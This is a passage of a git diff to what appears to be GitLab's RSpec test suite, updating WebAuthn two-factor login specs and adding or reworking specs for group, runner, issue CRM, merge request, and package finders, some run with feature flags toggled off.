let(:otp_required_for_login) { true } let(:user) { create(:user, webauthn_xid: WebAuthn.generate_user_id, otp_required_for_login: otp_required_for_login) } + let!(:webauthn_device) do + add_webauthn_device(app_id, user) + end - describe 'when there is only an U2F device' do - let!(:u2f_device) do - fake_device = U2F::FakeU2F.new(app_id) # "Client" - u2f = U2F::U2F.new(app_id) # "Server" + describe 'when 2FA via OTP is disabled' do + let(:otp_required_for_login) { false } - challenges = u2f.registration_requests.map(&:challenge) - device_response = fake_device.register_response(challenges[0]) - device_registration_params = { device_response: device_response, - name: 'My device' } + it 'allows logging in with the WebAuthn device' do + gitlab_sign_in(user) - U2fRegistration.register(user, app_id, device_registration_params, challenges) - FakeU2fDevice.new(page, 'My device', fake_device) - end + webauthn_device.respond_to_webauthn_authentication - it 'falls back to U2F' do - # WebAuthn registration is automatically created with the U2fRegistration because of the after_create callback - # so we need to delete it - WebauthnRegistration.delete_all + expect(page).to have_css('.sign-out-link', visible: false) + end + end + describe 'when 2FA via OTP is enabled' do + it 'allows logging in with the WebAuthn device' do gitlab_sign_in(user) - u2f_device.respond_to_u2f_authentication + webauthn_device.respond_to_webauthn_authentication expect(page).to have_css('.sign-out-link', visible: false) end end - describe 'when there is a WebAuthn device' do - let!(:webauthn_device) do - add_webauthn_device(app_id, user) - end + describe 'when a given WebAuthn device has already been registered by another user' do + describe 'but not the current user' do + let(:other_user) { create(:user, webauthn_xid: WebAuthn.generate_user_id, otp_required_for_login: otp_required_for_login) } - describe 'when 2FA via OTP is disabled' do - let(:otp_required_for_login) { false } + it 'does not allow logging in with that particular device' do + # Register other user with a different WebAuthn device + other_device = add_webauthn_device(app_id, other_user) - it 'allows logging in with the WebAuthn device' do + # Try authenticating user with the old WebAuthn device gitlab_sign_in(user) - - webauthn_device.respond_to_webauthn_authentication - - expect(page).to have_css('.sign-out-link', visible: false) + other_device.respond_to_webauthn_authentication + expect(page).to have_content('Authentication via WebAuthn device failed') end end - describe 'when 2FA via OTP is enabled' do - it 'allows logging in with the WebAuthn device' do - gitlab_sign_in(user) - + describe "and also the current user" do + # TODO Uncomment once WebAuthn::FakeClient supports passing credential options + # (especially allow_credentials, as this is needed to specify which credential the + # fake client should use. Currently, the first credential is always used). + # There is an issue open for this: https://github.com/cedarcode/webauthn-ruby/issues/259 + it "allows logging in with that particular device" do + pending("support for passing credential options in FakeClient") + # Register current user with the same WebAuthn device + current_user = gitlab_sign_in(:user) + visit profile_account_path + manage_two_factor_authentication + register_webauthn_device(webauthn_device) + gitlab_sign_out + + # Try authenticating user with the same WebAuthn device + gitlab_sign_in(current_user) webauthn_device.respond_to_webauthn_authentication expect(page).to have_css('.sign-out-link', visible: false) end end + end - describe 'when a given WebAuthn device has already been registered by another user' do - describe 'but not the current user' do - let(:other_user) { create(:user, webauthn_xid: WebAuthn.generate_user_id, otp_required_for_login: otp_required_for_login) } - - it 'does not allow logging in with that particular device' do - # Register other user with a different WebAuthn device - other_device = add_webauthn_device(app_id, other_user) - - # Try authenticating user with the old WebAuthn device - gitlab_sign_in(user) - other_device.respond_to_webauthn_authentication - expect(page).to have_content('Authentication via WebAuthn device failed') - end - end - - describe "and also the current user" do - # TODO Uncomment once WebAuthn::FakeClient supports passing credential options - # (especially allow_credentials, as this is needed to specify which credential the - # fake client should use. Currently, the first credential is always used). - # There is an issue open for this: https://github.com/cedarcode/webauthn-ruby/issues/259 - it "allows logging in with that particular device" do - pending("support for passing credential options in FakeClient") - # Register current user with the same WebAuthn device - current_user = gitlab_sign_in(:user) - visit profile_account_path - manage_two_factor_authentication - register_webauthn_device(webauthn_device) - gitlab_sign_out - - # Try authenticating user with the same WebAuthn device - gitlab_sign_in(current_user) - webauthn_device.respond_to_webauthn_authentication - - expect(page).to have_css('.sign-out-link', visible: false) - end - end - end - - describe 'when a given WebAuthn device has not been registered' do - it 'does not allow logging in with that particular device' do - unregistered_device = FakeWebauthnDevice.new(page, 'My device') - gitlab_sign_in(user) - unregistered_device.respond_to_webauthn_authentication + describe 'when a given WebAuthn device has not been registered' do + it 'does not allow logging in with that particular device' do + unregistered_device = FakeWebauthnDevice.new(page, 'My device') + gitlab_sign_in(user) + unregistered_device.respond_to_webauthn_authentication - expect(page).to have_content('Authentication via WebAuthn device failed') - end + expect(page).to have_content('Authentication via WebAuthn device failed') end + end - describe 'when more than one device has been registered by the same user' do - it 'allows logging in with either device' do - first_device = add_webauthn_device(app_id, user) - second_device = add_webauthn_device(app_id, user) + describe 'when more than one device has been registered by the same user' do + it 'allows logging in with either device' do + first_device = add_webauthn_device(app_id, user) + second_device = add_webauthn_device(app_id, user) - # Authenticate as both devices - [first_device, second_device].each do |device| - gitlab_sign_in(user) - # register_webauthn_device(device) - device.respond_to_webauthn_authentication + # Authenticate as both devices + [first_device, second_device].each do |device| + gitlab_sign_in(user) + # register_webauthn_device(device) + device.respond_to_webauthn_authentication - expect(page).to have_css('.sign-out-link', visible: false) + expect(page).to have_css('.sign-out-link', visible: false) - gitlab_sign_out - end + gitlab_sign_out end end end diff --git a/spec/finders/ci/auth_job_finder_spec.rb b/spec/finders/ci/auth_job_finder_spec.rb index 78827c9ddee..0a326699875 100644 --- a/spec/finders/ci/auth_job_finder_spec.rb +++ b/spec/finders/ci/auth_job_finder_spec.rb @@ -70,17 +70,6 @@ RSpec.describe Ci::AuthJobFinder do expect(subject.user).to be_from_ci_job_token expect(subject.user.ci_job_token_scope.source_project).to eq(job.project) end - - context 'when feature flag ci_scoped_job_token is disabled' do - before do - stub_feature_flags(ci_scoped_job_token: false) - end - - it 'does not set ci_job_token_scope on the job user' do - expect(subject).to eq(job) - expect(subject.user).not_to be_from_ci_job_token - end - end end end end diff --git a/spec/finders/ci/runners_finder_spec.rb b/spec/finders/ci/runners_finder_spec.rb index 10d3f641e02..7e3c1abd6d1 100644 --- a/spec/finders/ci/runners_finder_spec.rb +++ b/spec/finders/ci/runners_finder_spec.rb @@ -59,6 +59,20 @@ RSpec.describe Ci::RunnersFinder do end end + context 'by active status' do + it 'with active set as false calls the corresponding scope on Ci::Runner with false' do + expect(Ci::Runner).to receive(:active).with(false).and_call_original + + described_class.new(current_user: admin, params: { active: false }).execute + end + + it 'with active set as true calls the corresponding scope on Ci::Runner with true' do + expect(Ci::Runner).to receive(:active).with(true).and_call_original + + described_class.new(current_user: admin, params: { active: true }).execute + end + end + context 'by runner type' do it 'calls the corresponding scope on Ci::Runner' do expect(Ci::Runner).to receive(:project_type).and_call_original @@ -263,7 +277,15 @@ RSpec.describe Ci::RunnersFinder do let(:extra_params) { { search: 'runner_project_search' } } it 'returns correct runner' do - expect(subject).to eq([runner_project_3]) + expect(subject).to match_array([runner_project_3]) + end + end + + context 'by active status' do + let(:extra_params) { { active: false } } + + it 'returns correct runner' do + expect(subject).to match_array([runner_sub_group_1]) end end @@ -271,7 +293,7 @@ RSpec.describe Ci::RunnersFinder do let(:extra_params) { { status_status: 'paused' } } it 'returns correct runner' do - expect(subject).to eq([runner_sub_group_1]) + expect(subject).to match_array([runner_sub_group_1]) end end @@ -279,7 +301,7 @@ RSpec.describe Ci::RunnersFinder do let(:extra_params) { { tag_name: %w[runner_tag] } } it 'returns correct runner' do - expect(subject).to eq([runner_project_5]) + expect(subject).to match_array([runner_project_5]) end end diff --git a/spec/finders/environments/environments_by_deployments_finder_spec.rb b/spec/finders/environments/environments_by_deployments_finder_spec.rb index 7804ffa4ef1..1b86aced67d 100644 --- a/spec/finders/environments/environments_by_deployments_finder_spec.rb +++ b/spec/finders/environments/environments_by_deployments_finder_spec.rb @@ -11,7 +11,7 @@ RSpec.describe Environments::EnvironmentsByDeploymentsFinder do project.add_maintainer(user) end - shared_examples 'execute' do + describe '#execute' do context 'tagged deployment' do let(:environment_two) { create(:environment, project: project) } # Environments need to include commits, so rewind two commits to fit @@ -124,16 +124,4 @@ RSpec.describe Environments::EnvironmentsByDeploymentsFinder do end end end - - describe "#execute" do - include_examples 'execute' - - context 'when environments_by_deployments_finder_exists_optimization is disabled' do - before do - stub_feature_flags(environments_by_deployments_finder_exists_optimization: false) - end - - include_examples 'execute' - end - end end diff --git a/spec/finders/group_descendants_finder_spec.rb b/spec/finders/group_descendants_finder_spec.rb index 01c6eb05907..f6b87f7eeab 100644 --- a/spec/finders/group_descendants_finder_spec.rb +++ b/spec/finders/group_descendants_finder_spec.rb @@ -4,7 +4,12 @@ require 'spec_helper' RSpec.describe GroupDescendantsFinder do let_it_be(:user) { create(:user) } - let_it_be(:group) { create(:group) } + + let_it_be_with_reload(:group) do + create(:group).tap do |g| + g.add_owner(user) + end + end let(:params) { {} } @@ -12,254 +17,262 @@ RSpec.describe GroupDescendantsFinder do described_class.new(current_user: user, parent_group: group, params: params) end - before do - group.add_owner(user) - end - - describe '#has_children?' do - it 'is true when there are projects' do - create(:project, namespace: group) - - expect(finder.has_children?).to be_truthy - end - - context 'when there are subgroups' do + shared_examples 'group descentants finder examples' do + describe '#has_children?' do it 'is true when there are projects' do - create(:group, parent: group) + create(:project, namespace: group) expect(finder.has_children?).to be_truthy end - end - end - describe '#execute' do - it 'includes projects' do - project = create(:project, namespace: group) + context 'when there are subgroups' do + it 'is true when there are projects' do + create(:group, parent: group) - expect(finder.execute).to contain_exactly(project) + expect(finder.has_children?).to be_truthy + end + end end - context 'when archived is `true`' do - let(:params) { { archived: 'true' } } - - it 'includes archived projects' do - archived_project = create(:project, namespace: group, archived: true) + describe '#execute' do + it 'includes projects' do project = create(:project, namespace: group) - expect(finder.execute).to contain_exactly(archived_project, project) + expect(finder.execute).to contain_exactly(project) end - end - context 'when archived is `only`' do - let(:params) { { archived: 'only' } } + context 'when archived is `true`' do + let(:params) { { archived: 'true' } } - it 'includes only archived projects' do - archived_project = create(:project, namespace: group, archived: true) - _project = create(:project, namespace: group) + it 'includes archived projects' do + archived_project = create(:project, namespace: group, archived: true) + project = create(:project, namespace: group) - expect(finder.execute).to contain_exactly(archived_project) + expect(finder.execute).to contain_exactly(archived_project, project) + end end - end - it 'does not include archived projects' do - _archived_project = create(:project, :archived, namespace: group) + context 'when archived is `only`' do + let(:params) { { archived: 'only' } } - expect(finder.execute).to be_empty - end + it 'includes only archived projects' do + archived_project = create(:project, namespace: group, archived: true) + _project = create(:project, namespace: group) - context 'with a filter' do - let(:params) { { filter: 'test' } } + expect(finder.execute).to contain_exactly(archived_project) + end + end - it 'includes only projects matching the filter' do - _other_project = create(:project, namespace: group) - matching_project = create(:project, namespace: group, name: 'testproject') + it 'does not include archived projects' do + _archived_project = create(:project, :archived, namespace: group) - expect(finder.execute).to contain_exactly(matching_project) + expect(finder.execute).to be_empty end - end - it 'sorts elements by name as default' do - project1 = create(:project, namespace: group, name: 'z') - project2 = create(:project, namespace: group, name: 'a') + context 'with a filter' do + let(:params) { { filter: 'test' } } - expect(subject.execute).to eq([project2, project1]) - end + it 'includes only projects matching the filter' do + _other_project = create(:project, namespace: group) + matching_project = create(:project, namespace: group, name: 'testproject') - context 'sorting by name' do - let!(:project1) { create(:project, namespace: group, name: 'a', path: 'project-a') } - let!(:project2) { create(:project, namespace: group, name: 'z', path: 'project-z') } - let(:params) do - { - sort: 'name_asc' - } + expect(finder.execute).to contain_exactly(matching_project) + end end - it 'sorts elements by name' do - expect(subject.execute).to eq( - [ - project1, - project2 - ] - ) + it 'sorts elements by name as default' do + project1 = create(:project, namespace: group, name: 'z') + project2 = create(:project, namespace: group, name: 'a') + + expect(subject.execute).to match_array([project2, project1]) end - context 'with nested groups' do - let!(:subgroup1) { create(:group, parent: group, name: 'a', path: 'sub-a') } - let!(:subgroup2) { create(:group, parent: group, name: 'z', path: 'sub-z') } + context 'sorting by name' do + let!(:project1) { create(:project, namespace: group, name: 'a', path: 'project-a') } + let!(:project2) { create(:project, namespace: group, name: 'z', path: 'project-z') } + let(:params) do + { + sort: 'name_asc' + } + end it 'sorts elements by name' do expect(subject.execute).to eq( [ - subgroup1, - subgroup2, project1, project2 ] ) end - end - end - - it 'does not include projects shared with the group' do - project = create(:project, namespace: group) - other_project = create(:project) - other_project.project_group_links.create!(group: group, - group_access: Gitlab::Access::MAINTAINER) - expect(finder.execute).to contain_exactly(project) - end - end + context 'with nested groups' do + let!(:subgroup1) { create(:group, parent: group, name: 'a', path: 'sub-a') } + let!(:subgroup2) { create(:group, parent: group, name: 'z', path: 'sub-z') } + + it 'sorts elements by name' do + expect(subject.execute).to eq( + [ + subgroup1, + subgroup2, + project1, + project2 + ] + ) + end + end + end - context 'with shared groups' do - let_it_be(:other_group) { create(:group) } - let_it_be(:shared_group_link) do - create(:group_group_link, - shared_group: group, - shared_with_group: other_group) - end + it 'does not include projects shared with the group' do + project = create(:project, namespace: group) + other_project = create(:project) + other_project.project_group_links.create!(group: group, + group_access: Gitlab::Access::MAINTAINER) - context 'without common ancestor' do - it { expect(finder.execute).to be_empty } + expect(finder.execute).to contain_exactly(project) + end end - context 'with common ancestor' do - let_it_be(:common_ancestor) { create(:group) } - let_it_be(:other_group) { create(:group, parent: common_ancestor) } - let_it_be(:group) { create(:group, parent: common_ancestor) } + context 'with shared groups' do + let_it_be(:other_group) { create(:group) } + let_it_be(:shared_group_link) do + create(:group_group_link, + shared_group: group, + shared_with_group: other_group) + end - context 'querying under the common ancestor' do + context 'without common ancestor' do it { expect(finder.execute).to be_empty } end - context 'querying the common ancestor' do - subject(:finder) do - described_class.new(current_user: user, parent_group: common_ancestor, params: params) + context 'with common ancestor' do + let_it_be(:common_ancestor) { create(:group) } + let_it_be(:other_group) { create(:group, parent: common_ancestor) } + let_it_be(:group) { create(:group, parent: common_ancestor) } + + context 'querying under the common ancestor' do + it { expect(finder.execute).to be_empty } end - it 'contains shared subgroups' do - expect(finder.execute).to contain_exactly(group, other_group) + context 'querying the common ancestor' do + subject(:finder) do + described_class.new(current_user: user, parent_group: common_ancestor, params: params) + end + + it 'contains shared subgroups' do + expect(finder.execute).to contain_exactly(group, other_group) + end end end end - end - context 'with nested groups' do - let!(:project) { create(:project, namespace: group) } - let!(:subgroup) { create(:group, :private, parent: group) } + context 'with nested groups' do + let!(:project) { create(:project, namespace: group) } + let!(:subgroup) { create(:group, :private, parent: group) } - describe '#execute' do - it 'contains projects and subgroups' do - expect(finder.execute).to contain_exactly(subgroup, project) - end + describe '#execute' do + it 'contains projects and subgroups' do + expect(finder.execute).to contain_exactly(subgroup, project) + end - it 'does not include subgroups the user does not have access to' do - subgroup.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) + it 'does not include subgroups the user does not have access to' do + subgroup.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) - public_subgroup = create(:group, :public, parent: group, path: 'public-group') - other_subgroup = create(:group, :private, parent: group, path: 'visible-private-group') - other_user = create(:user) - other_subgroup.add_developer(other_user) + public_subgroup = create(:group, :public, parent: group, path: 'public-group') + other_subgroup = create(:group, :private, parent: group, path: 'visible-private-group') + other_user = create(:user) + other_subgroup.add_developer(other_user) - finder = described_class.new(current_user: other_user, parent_group: group) + finder = described_class.new(current_user: other_user, parent_group: group) - expect(finder.execute).to contain_exactly(public_subgroup, other_subgroup) - end + expect(finder.execute).to contain_exactly(public_subgroup, other_subgroup) + end - it 'only includes public groups when no user is given' do - public_subgroup = create(:group, :public, parent: group) - _private_subgroup = create(:group, :private, parent: group) + it 'only includes public groups when no user is given' do + public_subgroup = create(:group, :public, parent: group) + _private_subgroup = create(:group, :private, parent: group) - finder = described_class.new(current_user: nil, parent_group: group) + finder = described_class.new(current_user: nil, parent_group: group) - expect(finder.execute).to contain_exactly(public_subgroup) - end + expect(finder.execute).to contain_exactly(public_subgroup) + end - context 'when archived is `true`' do - let(:params) { { archived: 'true' } } + context 'when archived is `true`' do + let(:params) { { archived: 'true' } } - it 'includes archived projects in the count of subgroups' do - create(:project, namespace: subgroup, archived: true) + it 'includes archived projects in the count of subgroups' do + create(:project, namespace: subgroup, archived: true) - expect(finder.execute.first.preloaded_project_count).to eq(1) + expect(finder.execute.first.preloaded_project_count).to eq(1) + end end - end - context 'with a filter' do - let(:params) { { filter: 'test' } } + context 'with a filter' do + let(:params) { { filter: 'test' } } - it 'contains only matching projects and subgroups' do - matching_project = create(:project, namespace: group, name: 'Testproject') - matching_subgroup = create(:group, name: 'testgroup', parent: group) + it 'contains only matching projects and subgroups' do + matching_project = create(:project, namespace: group, name: 'Testproject') + matching_subgroup = create(:group, name: 'testgroup', parent: group) - expect(finder.execute).to contain_exactly(matching_subgroup, matching_project) - end + expect(finder.execute).to contain_exactly(matching_subgroup, matching_project) + end - it 'does not include subgroups the user does not have access to' do - _invisible_subgroup = create(:group, :private, parent: group, name: 'test1') - other_subgroup = create(:group, :private, parent: group, name: 'test2') - public_subgroup = create(:group, :public, parent: group, name: 'test3') - other_subsubgroup = create(:group, :private, parent: other_subgroup, name: 'test4') - other_user = create(:user) - other_subgroup.add_developer(other_user) + it 'does not include subgroups the user does not have access to' do + _invisible_subgroup = create(:group, :private, parent: group, name: 'test1') + other_subgroup = create(:group, :private, parent: group, name: 'test2') + public_subgroup = create(:group, :public, parent: group, name: 'test3') + other_subsubgroup = create(:group, :private, parent: other_subgroup, name: 'test4') + other_user = create(:user) + other_subgroup.add_developer(other_user) - finder = described_class.new(current_user: other_user, - parent_group: group, - params: params) + finder = described_class.new(current_user: other_user, + parent_group: group, + params: params) - expect(finder.execute).to contain_exactly(other_subgroup, public_subgroup, other_subsubgroup) - end + expect(finder.execute).to contain_exactly(other_subgroup, public_subgroup, other_subsubgroup) + end - context 'with matching children' do - it 'includes a group that has a subgroup matching the query and its parent' do - matching_subgroup = create(:group, :private, name: 'testgroup', parent: subgroup) + context 'with matching children' do + it 'includes a group that has a subgroup matching the query and its parent' do + matching_subgroup = create(:group, :private, name: 'testgroup', parent: subgroup) - expect(finder.execute).to contain_exactly(subgroup, matching_subgroup) - end + expect(finder.execute).to contain_exactly(subgroup, matching_subgroup) + end - it 'includes the parent of a matching project' do - matching_project = create(:project, namespace: subgroup, name: 'Testproject') + it 'includes the parent of a matching project' do + matching_project = create(:project, namespace: subgroup, name: 'Testproject') - expect(finder.execute).to contain_exactly(subgroup, matching_project) - end + expect(finder.execute).to contain_exactly(subgroup, matching_project) + end - context 'with a small page size' do - let(:params) { { filter: 'test', per_page: 1 } } + context 'with a small page size' do + let(:params) { { filter: 'test', per_page: 1 } } - it 'contains all the ancestors of a matching subgroup regardless the page size' do - subgroup = create(:group, :private, parent: group) - matching = create(:group, :private, name: 'testgroup', parent: subgroup) + it 'contains all the ancestors of a matching subgroup regardless the page size' do + subgroup = create(:group, :private, parent: group) + matching = create(:group, :private, name: 'testgroup', parent: subgroup) - expect(finder.execute).to contain_exactly(subgroup, matching) + expect(finder.execute).to contain_exactly(subgroup, matching) + end end - end - it 'does not include the parent itself' do - group.update!(name: 'test') + it 'does not include the parent itself' do + group.update!(name: 'test') - expect(finder.execute).not_to include(group) + expect(finder.execute).not_to include(group) + end end end end end end + + it_behaves_like 'group descentants finder examples' + + context 'when feature flag :linear_group_descendants_finder is disabled' do + before do + stub_feature_flags(linear_group_descendants_finder: false) + end + + it_behaves_like 'group descentants finder examples' + end end diff --git a/spec/finders/groups_finder_spec.rb b/spec/finders/groups_finder_spec.rb index 10a08d7326e..a4cbee6a124 100644 --- a/spec/finders/groups_finder_spec.rb +++ b/spec/finders/groups_finder_spec.rb @@ -5,7 +5,7 @@ require 'spec_helper' RSpec.describe GroupsFinder do include AdminModeHelper - describe '#execute' do + shared_examples '#execute' do let(:user) { create(:user) } describe 'root level groups' do @@ -20,6 +20,7 @@ RSpec.describe GroupsFinder do user_private_group) :regular | { all_available: false } | %i(user_public_group user_internal_group user_private_group) :regular | {} | %i(public_group internal_group user_public_group user_internal_group user_private_group) + :regular | { min_access_level: Gitlab::Access::DEVELOPER } | %i(user_public_group user_internal_group user_private_group) :external | { all_available: true } | %i(public_group user_public_group user_internal_group user_private_group) :external | { all_available: false } | %i(user_public_group user_internal_group user_private_group) @@ -261,4 +262,16 @@ RSpec.describe GroupsFinder do end end end + + describe '#execute' do + include_examples '#execute' + + context 'when use_traversal_ids_groups_finder feature flags is disabled' do + before do + stub_feature_flags(use_traversal_ids_groups_finder: false) + end + + include_examples '#execute' + end + end end diff --git a/spec/finders/issuables/crm_contact_filter_spec.rb b/spec/finders/issuables/crm_contact_filter_spec.rb new file mode 100644 index 00000000000..d6eccab39ad --- /dev/null +++ b/spec/finders/issuables/crm_contact_filter_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Issuables::CrmContactFilter do + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + + let_it_be(:contact1) { create(:contact, group: group) } + let_it_be(:contact2) { create(:contact, group: group) } + + let_it_be(:contact1_issue1) { create(:issue, project: project) } + let_it_be(:contact1_issue2) { create(:issue, project: project) } + let_it_be(:contact2_issue1) { create(:issue, project: project) } + let_it_be(:issues) { Issue.where(id: [contact1_issue1.id, contact1_issue2.id, contact2_issue1.id]) } + + before_all do + create(:issue_customer_relations_contact, issue: contact1_issue1, contact: contact1) + create(:issue_customer_relations_contact, issue: contact1_issue2, contact: contact1) + create(:issue_customer_relations_contact, issue: contact2_issue1, contact: contact2) + end + + describe 'when a contact has issues' do + it 'returns all contact1 issues' do + params = { crm_contact_id: contact1.id } + + expect(described_class.new(params: params).filter(issues)).to contain_exactly(contact1_issue1, contact1_issue2) + end + + it 'returns all contact2 issues' do + params = { crm_contact_id: contact2.id } + + expect(described_class.new(params: params).filter(issues)).to contain_exactly(contact2_issue1) + end + end + + describe 'when a contact has no issues' do + it 'returns no issues' do + contact3 = create(:contact, group: group) + params = { crm_contact_id: contact3.id } + + expect(described_class.new(params: params).filter(issues)).to be_empty + end + end +end diff --git a/spec/finders/issuables/crm_organization_filter_spec.rb b/spec/finders/issuables/crm_organization_filter_spec.rb new file mode 100644 index 00000000000..2a521dcf721 --- /dev/null +++ b/spec/finders/issuables/crm_organization_filter_spec.rb @@ -0,0 +1,48 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Issuables::CrmOrganizationFilter do + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + + let_it_be(:organization1) { create(:organization, group: group) } + let_it_be(:organization2) { create(:organization, group: group) } + let_it_be(:contact1) { create(:contact, group: group, organization: organization1) } + let_it_be(:contact2) { create(:contact, group: group, organization: organization1) } + let_it_be(:contact3) { create(:contact, group: group, organization: organization2) } + + let_it_be(:contact1_issue) { create(:issue, project: project) } + let_it_be(:contact2_issue) { create(:issue, project: project) } + let_it_be(:contact3_issue) { create(:issue, project: project) } + let_it_be(:issues) { Issue.where(id: [contact1_issue.id, contact2_issue.id, contact3_issue.id]) } + + before_all do + create(:issue_customer_relations_contact, issue: contact1_issue, contact: contact1) + create(:issue_customer_relations_contact, issue: contact2_issue, contact: contact2) + create(:issue_customer_relations_contact, issue: contact3_issue, contact: contact3) + end + + describe 'when an organization has issues' do + it 'returns all organization1 issues' do + params = { crm_organization_id: organization1.id } + + expect(described_class.new(params: params).filter(issues)).to contain_exactly(contact1_issue, contact2_issue) + end + + it 'returns all organization2 issues' do + params = { crm_organization_id: organization2.id } + + expect(described_class.new(params: params).filter(issues)).to contain_exactly(contact3_issue) + end + end + + describe 'when an organization has no issues' do + it 'returns no issues' do + organization3 = create(:organization, group: group) + params = { crm_organization_id: organization3.id } + + expect(described_class.new(params: params).filter(issues)).to be_empty + end + end +end diff --git a/spec/finders/issues_finder_spec.rb b/spec/finders/issues_finder_spec.rb index 9f12308013e..31563a6326d 100644 --- a/spec/finders/issues_finder_spec.rb +++ b/spec/finders/issues_finder_spec.rb @@ -910,6 +910,45 @@ RSpec.describe IssuesFinder do end end + context 'filtering by crm contact' do + let_it_be(:contact1) { create(:contact, group: group) } + let_it_be(:contact2) { create(:contact, group: group) } + + let_it_be(:contact1_issue1) { create(:issue, project: project1) } + let_it_be(:contact1_issue2) { create(:issue, project: project1) } + let_it_be(:contact2_issue1) { create(:issue, project: project1) } + + let(:params) { { crm_contact_id: contact1.id } } + + it 'returns for that contact' do + create(:issue_customer_relations_contact, issue: contact1_issue1, contact: contact1) + create(:issue_customer_relations_contact, issue: contact1_issue2, contact: contact1) + create(:issue_customer_relations_contact, issue: contact2_issue1, contact: contact2) + + expect(issues).to contain_exactly(contact1_issue1, contact1_issue2) + end + end + + context 'filtering by crm organization' do + let_it_be(:organization) { create(:organization, group: group) } + let_it_be(:contact1) { create(:contact, group: group, organization: organization) } + let_it_be(:contact2) { create(:contact, group: group, organization: organization) } + + let_it_be(:contact1_issue1) { create(:issue, project: project1) } + let_it_be(:contact1_issue2) { create(:issue, project: project1) } + let_it_be(:contact2_issue1) { create(:issue, project: project1) } + + let(:params) { { crm_organization_id: organization.id } } + + it 'returns for that contact' do + create(:issue_customer_relations_contact, issue: contact1_issue1, contact: contact1) + create(:issue_customer_relations_contact, issue: contact1_issue2, contact: contact1) + create(:issue_customer_relations_contact, issue: contact2_issue1, contact: contact2) + + expect(issues).to contain_exactly(contact1_issue1, contact1_issue2, contact2_issue1) + end + end + context 'when the user is unauthorized' do let(:search_user) { nil } diff --git a/spec/finders/merge_requests_finder_spec.rb b/spec/finders/merge_requests_finder_spec.rb index 42197a6b103..03639bc0b98 100644 --- a/spec/finders/merge_requests_finder_spec.rb +++ b/spec/finders/merge_requests_finder_spec.rb @@ -681,6 +681,18 @@ RSpec.describe MergeRequestsFinder do expect(mrs).to eq([mr1]) end + it 'filters merge requests ignoring empty deployed_before' do + mrs = described_class.new(user, deployed_before: '').execute + + expect(mrs.size).to eq(7) + end + + it 'filters merge requests ignoring invalid deployed_before' do + mrs = described_class.new(user, deployed_before: '2021-99-99').execute + + expect(mrs.size).to eq(7) + end + it 'filters merge requests deployed after a given date' do mrs = described_class .new(user, deployed_after: '2020-10-01 12:00') @@ -688,6 +700,18 @@ RSpec.describe MergeRequestsFinder do expect(mrs).to eq([mr2]) end + + it 'filters merge requests ignoring empty deployed_after' do + mrs = described_class.new(user, deployed_after: '').execute + + expect(mrs.size).to eq(7) + end + + it 'filters merge requests ignoring invalid deployed_after' do + mrs = described_class.new(user, deployed_after: '2021-99-99').execute + + expect(mrs.size).to eq(7) + end end it 'does not raise any exception with complex filters' do diff --git a/spec/finders/packages/build_infos_finder_spec.rb b/spec/finders/packages/build_infos_finder_spec.rb new file mode 100644 index 00000000000..23425de4316 --- /dev/null +++ b/spec/finders/packages/build_infos_finder_spec.rb @@ -0,0 +1,64 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Packages::BuildInfosFinder do + using RSpec::Parameterized::TableSyntax + + let_it_be(:package) { create(:package) } + let_it_be(:build_infos) { create_list(:package_build_info, 5, :with_pipeline, package: package) } + let_it_be(:build_info_with_empty_pipeline) { create(:package_build_info, package: package) } + + let(:finder) { described_class.new(package, params) } + let(:params) do + { + first: first, + last: last, + after: after, + before: before, + max_page_size: max_page_size, + support_next_page: support_next_page + } + end + + describe '#execute' do + subject { finder.execute } + + where(:first, :last, :after_index, :before_index, :max_page_size, :support_next_page, :expected_build_infos_indexes) do + # F L AI BI MPS SNP + nil | nil | nil | nil | nil | false | [4, 3, 2, 1, 0] + nil | nil | nil | nil | 10 | false | [4, 3, 2, 1, 0] + nil | nil | nil | nil | 2 | false | [4, 3] + 2 | nil | nil | nil | nil | false | [4, 3] + 2 | nil | nil | nil | nil | true | [4, 3, 2] + 2 | nil | 3 | nil | nil | false | [2, 1] + 2 | nil | 3 | nil | nil | true | [2, 1, 0] + 3 | nil | 4 | nil | 2 | false | [3, 2] + 3 | nil | 4 | nil | 2 | true | [3, 2, 1] + nil | 2 | nil | nil | nil | false | [0, 1] + nil | 2 | nil | nil | nil | true | [0, 1, 2] + nil | 2 | nil | 1 | nil | false | [2, 3] + nil | 2 | nil | 1 | nil | true | [2, 3, 4] + nil | 3 | nil | 0 | 2 | false | [1, 2] + nil | 3 | nil | 0 | 2 | true | [1, 2, 3] + end + + with_them do + let(:expected_build_infos) do + expected_build_infos_indexes.map do |idx| + build_infos[idx] + end + end + + let(:after) do + build_infos[after_index].pipeline_id if after_index + end + + let(:before) do + build_infos[before_index].pipeline_id if before_index + end + + it { is_expected.to eq(expected_build_infos) } + end + end +end diff --git a/spec/finders/packages/group_packages_finder_spec.rb b/spec/finders/packages/group_packages_finder_spec.rb index 3254c436674..c2dbfb59eb2 100644 --- a/spec/finders/packages/group_packages_finder_spec.rb +++ b/spec/finders/packages/group_packages_finder_spec.rb @@ -107,6 +107,28 @@ RSpec.describe Packages::GroupPackagesFinder do end end + context 'deploy tokens' do + let(:add_user_to_group) { false } + + context 'group deploy token' do + let_it_be(:deploy_token_for_group) { create(:deploy_token, :group, read_package_registry: true) } + let_it_be(:group_deploy_token) { create(:group_deploy_token, deploy_token: deploy_token_for_group, group: group) } + + let(:user) { deploy_token_for_group } + + it { is_expected.to match_array([package1, package2, package4]) } + end + + context 'project deploy token' do + let_it_be(:deploy_token_for_project) { create(:deploy_token, read_package_registry: true) } + let_it_be(:project_deploy_token) { create(:project_deploy_token, deploy_token: deploy_token_for_project, project: subproject) } + + let(:user) { deploy_token_for_project } + + it { is_expected.to match_array([package4]) } + end + end + context 'avoid N+1 query' do it 'avoids N+1 database queries' do count = ActiveRecord::QueryRecorder.new { subject } diff --git a/spec/finders/packages/nuget/package_finder_spec.rb b/spec/finders/packages/nuget/package_finder_spec.rb index 4ad02ce7da8..045dba295ac 100644 --- a/spec/finders/packages/nuget/package_finder_spec.rb +++ b/spec/finders/packages/nuget/package_finder_spec.rb @@ -71,7 +71,7 @@ RSpec.describe Packages::Nuget::PackageFinder do end context 'with prefix wildcard' do - let(:package_name) { 